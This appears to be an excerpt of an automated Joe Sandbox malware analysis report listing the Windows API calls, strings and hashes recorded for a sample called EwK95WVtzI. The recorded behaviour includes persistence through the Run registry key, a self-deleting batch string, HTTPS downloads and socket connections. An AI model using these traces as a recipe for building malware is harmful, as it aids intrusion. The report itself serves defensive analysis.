                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                                                                                                                                                                                                                                          • Instruction ID: 88215b3929851b503fb9e0336a359976704c6dde636ba1c8479b7b66991880c0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25C04C36221850CFC781CF18E444E81B3E4FB09631B068491E805DB721D234EC41CA40
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                                                                                                                                                                                                                                          • Instruction ID: 88215b3929851b503fb9e0336a359976704c6dde636ba1c8479b7b66991880c0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25C04C36221850CFC781CF18E444E81B3E4FB09631B068491E805DB721D234EC41CA40
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 013F74E4
                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 013F7503
                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 013F752E
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,013FC650), ref: 013F7559
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,pigalicapi), ref: 013F756B
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.exe), ref: 013F757D
                                                                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 013F758F
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 013F75B4
                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000274,00000001), ref: 013F75CE
                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,013FC690,00000000,00000002,00000000), ref: 013F7620
                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,pigalicapi), ref: 013F7636
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 013F7643
                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 013F766F
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 013F767C
                                                                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,slf,00000000), ref: 013F7698
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.bat), ref: 013F76AA
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 013F76C6
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000000), ref: 013F76F9
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,00000000), ref: 013F770E
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 013F771B
                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 013F778C
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 013F779D
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 013F77A5
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$lstrcat$Close$CreateHandleNameProcess$AttributesCountDeleteDirectoryEnvironmentExitModuleOpenProfileSleepTempTerminateThreadTickUsersValueVariableWritelstrlenwnsprintf
                                                                                                                                                                                                                                                          • String ID: .bat$.exe$:repeatdel %sif exist %s goto :repeatdel %%0$D$TEMP$USERPROFILE$pigalicapi$slf$software\microsoft\windows\currentversion\run
                                                                                                                                                                                                                                                          • API String ID: 3221898725-1842671280
                                                                                                                                                                                                                                                          • Opcode ID: 8ae776d180117e9701e43497d6624851d065b6a0ed7e50d8d87cac0307f689f7
                                                                                                                                                                                                                                                          • Instruction ID: 0354f15c6389790efe676d45f88d3a775fc1ea649e007aecdfd9a57e93d2136d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ae776d180117e9701e43497d6624851d065b6a0ed7e50d8d87cac0307f689f7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A57181B1A8031DABEB30DB60DC49FEA777CAB48705F44559CF309A6185DBB49A84CF60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 013F6DC9
                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 013F6DD1
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 013F6E5F
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000), ref: 013F6EB5
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,00000000), ref: 013F6EDD
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 013F6F7A
                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000077B0,?,00000000,00000000), ref: 013F6FE3
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 013F6FF0
                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 013F7028
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 013F7059
                                                                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,?,00000000), ref: 013F7077
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 013F7093
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 013F7101
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000,?,?,00000000,?), ref: 013F715D
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 013F7183
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 013F71A9
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 013F71BC
                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 013F7239
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Virtual$AllocFile$CloseCreateFreeHandleWrite$CountEnvironmentInitializeNameSleepTempThreadTickUninitializeVariable
                                                                                                                                                                                                                                                          • String ID: TEMP
                                                                                                                                                                                                                                                          • API String ID: 3110491842-1036413054
                                                                                                                                                                                                                                                          • Opcode ID: a17520b861107d75a86a7c7fb2ef22de046a5b98637a60cb00dd2f3e9e92127e
                                                                                                                                                                                                                                                          • Instruction ID: 546e61b956f478e6b919abde9859c03c441350dbb043459b3c6c2fd479bb71af
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a17520b861107d75a86a7c7fb2ef22de046a5b98637a60cb00dd2f3e9e92127e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21F10AB5A00209EFDB14DF98D985F9EB7B5BB88304F248198E609AB390D771EE45CF50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • InternetOpenA.WININET(013FC398,00000001,00000000,00000000,00000000), ref: 013F293C
                                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,00000000,000001BB,013FC3D2,013FC3D1,00000003,00000000,00000000), ref: 013F296C
                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,GET,013FC3D8,1.1,00000000,00000000,80800000,00000000), ref: 013F299D
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 013F29C0
                                                                                                                                                                                                                                                          • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 013F29E8
                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 013F2A0E
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Accept: */*,00000000,00000000), ref: 013F2A1C
                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,Accept: */*,00000000), ref: 013F2A2B
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 013F2A73
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 013F2AAF
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 013F2ACB
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 013F2AD5
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 013F2ADF
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$HttpOpenOptionRequest$ConnectErrorFileLastQueryReadSendlstrlenwsprintf
                                                                                                                                                                                                                                                          • String ID: 1.1$Accept: */*$GET$https://%s
                                                                                                                                                                                                                                                          • API String ID: 2082764430-47765423
                                                                                                                                                                                                                                                          • Opcode ID: bc3d79926f83509546711c6323ae952ee666d5e31e6488415d2f090ce93cfaf0
                                                                                                                                                                                                                                                          • Instruction ID: e34c92c4ff9e4a9c8751a66e306bea7ee950840250bd0a7a81052b88ca6a5c45
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc3d79926f83509546711c6323ae952ee666d5e31e6488415d2f090ce93cfaf0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6551FB7598021CEBEB24CF94DC99FEEB7B8AB48704F10458DF605A6284C7B4AA94CF54
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?), ref: 013F35F4
                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 013F362D
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 013F3651
                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 013F3673
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 013F369C
                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 013F36DD
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 013F371F
                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,-00000001), ref: 013F380C
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.dll), ref: 013F381E
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 013F383C
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 013F38B3
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013F38C7
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 013F38D4
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$Virtual$FreeHandleModule$AllocCloseCreateNameReadSizelstrcatlstrcpylstrcpynlstrlen
                                                                                                                                                                                                                                                          • String ID: .dll
                                                                                                                                                                                                                                                          • API String ID: 4040249471-2738580789
                                                                                                                                                                                                                                                          • Opcode ID: c8c753e15fb3f001804b0d4749ee07824a11d1aaae8059319e2c5dfab239fcf5
                                                                                                                                                                                                                                                          • Instruction ID: b522add70198ede97a7bbd5c6b08acd9021017748d9f963d29f49528dff02938
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8c753e15fb3f001804b0d4749ee07824a11d1aaae8059319e2c5dfab239fcf5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D812BB594022CEBDB20DB64DD89FD9BBB9BB58308F1041CCE209A7280D6749B89CF55
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 013F2B72
                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 013F2B93
                                                                                                                                                                                                                                                          • InternetOpenUrlA.WININET(00000000,00000000,?,00000042,80000200,00000000), ref: 013F2BB0
                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 013F2C08
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 013F2C48
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000000,00000000), ref: 013F2C97
                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,0000001D,?,00000100,00000000), ref: 013F2D35
                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,gzip), ref: 013F2D4B
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013F2DC8
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 013F2DD2
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 013F2DDA
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • gzip, xrefs: 013F2D3F
                                                                                                                                                                                                                                                          • Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate, xrefs: 013F2B32
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Internet$Query$HttpInfoOptionVirtual$AllocCloseErrorFileFreeHandleLastOpenReadlstrcmpi
                                                                                                                                                                                                                                                          • String ID: Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate$gzip
                                                                                                                                                                                                                                                          • API String ID: 2564233093-2863726208
                                                                                                                                                                                                                                                          • Opcode ID: 8f46d7853f618b057088cbf174250493273d668f325bc20f673e1e9511b49333
                                                                                                                                                                                                                                                          • Instruction ID: 8fbf5ab5bf14c9b5666bc21ee898bcf3a7faa77a168801ac9878336759e90015
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f46d7853f618b057088cbf174250493273d668f325bc20f673e1e9511b49333
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20911A7590421CEFDB25CF94CC58BEAB7B9BB48304F50819DF609AB284DB759A84CF50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 00507952
                                                                                                                                                                                                                                                            • Part of subcall function 00508FDD: _free.LIBCMT ref: 00508FFA
                                                                                                                                                                                                                                                            • Part of subcall function 00508FDD: _free.LIBCMT ref: 0050900C
                                                                                                                                                                                                                                                            • Part of subcall function 00508FDD: _free.LIBCMT ref: 0050901E
                                                                                                                                                                                                                                                            • Part of subcall function 00508FDD: _free.LIBCMT ref: 00509030
                                                                                                                                                                                                                                                            • Part of subcall function 00508FDD: _free.LIBCMT ref: 00509042
                                                                                                                                                                                                                                                            • Part of subcall function 00508FDD: _free.LIBCMT ref: 00509054
                                                                                                                                                                                                                                                            • Part of subcall function 00508FDD: _free.LIBCMT ref: 00509066
                                                                                                                                                                                                                                                            • Part of subcall function 00508FDD: _free.LIBCMT ref: 00509078
                                                                                                                                                                                                                                                            • Part of subcall function 00508FDD: _free.LIBCMT ref: 0050908A
                                                                                                                                                                                                                                                            • Part of subcall function 00508FDD: _free.LIBCMT ref: 0050909C
                                                                                                                                                                                                                                                            • Part of subcall function 00508FDD: _free.LIBCMT ref: 005090AE
                                                                                                                                                                                                                                                            • Part of subcall function 00508FDD: _free.LIBCMT ref: 005090C0
                                                                                                                                                                                                                                                            • Part of subcall function 00508FDD: _free.LIBCMT ref: 005090D2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00507947
                                                                                                                                                                                                                                                            • Part of subcall function 005073BC: HeapFree.KERNEL32(00000000,00000000,?,00509172,005062C1,00000000,005062C1,00000000,?,00509199,005062C1,00000007,005062C1,?,00507AA6,005062C1), ref: 005073D2
                                                                                                                                                                                                                                                            • Part of subcall function 005073BC: GetLastError.KERNEL32(005062C1,?,00509172,005062C1,00000000,005062C1,00000000,?,00509199,005062C1,00000007,005062C1,?,00507AA6,005062C1,005062C1), ref: 005073E4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00507969
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0050797E
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00507989
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 005079AB
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 005079BE
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 005079CC
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 005079D7
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00507A0F
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00507A16
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00507A33
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00507A4B
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                                                                                          • Opcode ID: a4536150599ea642d012f00aaf8d60e4065d8a4cb0abf92455bd182ebf143480
                                                                                                                                                                                                                                                          • Instruction ID: f755abf02f7ca6bf70d1f77f21aa40d4b78985fdfd90cb4e46d86ee208d50f4d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4536150599ea642d012f00aaf8d60e4065d8a4cb0abf92455bd182ebf143480
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14313E31A0860A9FEB30AA39DC49B9F7BE5BB48310F14581DE959D61D1DA30BD40DB60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00506904
                                                                                                                                                                                                                                                            • Part of subcall function 005073BC: HeapFree.KERNEL32(00000000,00000000,?,00509172,005062C1,00000000,005062C1,00000000,?,00509199,005062C1,00000007,005062C1,?,00507AA6,005062C1), ref: 005073D2
                                                                                                                                                                                                                                                            • Part of subcall function 005073BC: GetLastError.KERNEL32(005062C1,?,00509172,005062C1,00000000,005062C1,00000000,?,00509199,005062C1,00000007,005062C1,?,00507AA6,005062C1,005062C1), ref: 005073E4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00506910
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0050691B
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00506926
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00506931
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0050693C
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00506947
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00506952
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0050695D
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0050696B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID: HuR
                                                                                                                                                                                                                                                          • API String ID: 776569668-1457895425
                                                                                                                                                                                                                                                          • Opcode ID: ab5528308a4999588bf2b9a23c5d9cd42171525f2b42d568f2d24115219f1007
                                                                                                                                                                                                                                                          • Instruction ID: 3d29d25a9d4aa9feaadfe247c1817d5401684db805de1aabacc4f71d0d57da49
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab5528308a4999588bf2b9a23c5d9cd42171525f2b42d568f2d24115219f1007
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA11A47690410DAFDB11EF94CD46CDD3FA5FF48350B0154A9FA188B2A2DA31EA50ABA4
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0050E486,?,00000000,?,00000000,00000000), ref: 0050DD53
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 0050DDCE
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 0050DDE9
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0050DE0F
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,0050E486,00000000,?,?,?,?,?,?,?,?,?,0050E486,?), ref: 0050DE2E
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,0050E486,00000000,?,?,?,?,?,?,?,?,?,0050E486,?), ref: 0050DE67
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                                                                                          • Opcode ID: f656515db0e17741ad34338a90d44b457458dee8831fc841e1a67db030fe6ed1
                                                                                                                                                                                                                                                          • Instruction ID: b460209e056d9d1f52e82015fd2956f144b5688b7cb2e627a930430920197c8e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f656515db0e17741ad34338a90d44b457458dee8831fc841e1a67db030fe6ed1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0151AEB1A002099FDB10CFA8DC85AEEBBF8FF19310F14451AE956E7291E730A945CB70
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 013FA09C
                                                                                                                                                                                                                                                          • htons.WS2_32(?), ref: 013FA0C0
                                                                                                                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 013FA0CD
                                                                                                                                                                                                                                                          • connect.WS2_32(000000FF,?,00000010), ref: 013FA121
                                                                                                                                                                                                                                                          • closesocket.WS2_32(000000FF), ref: 013FA13E
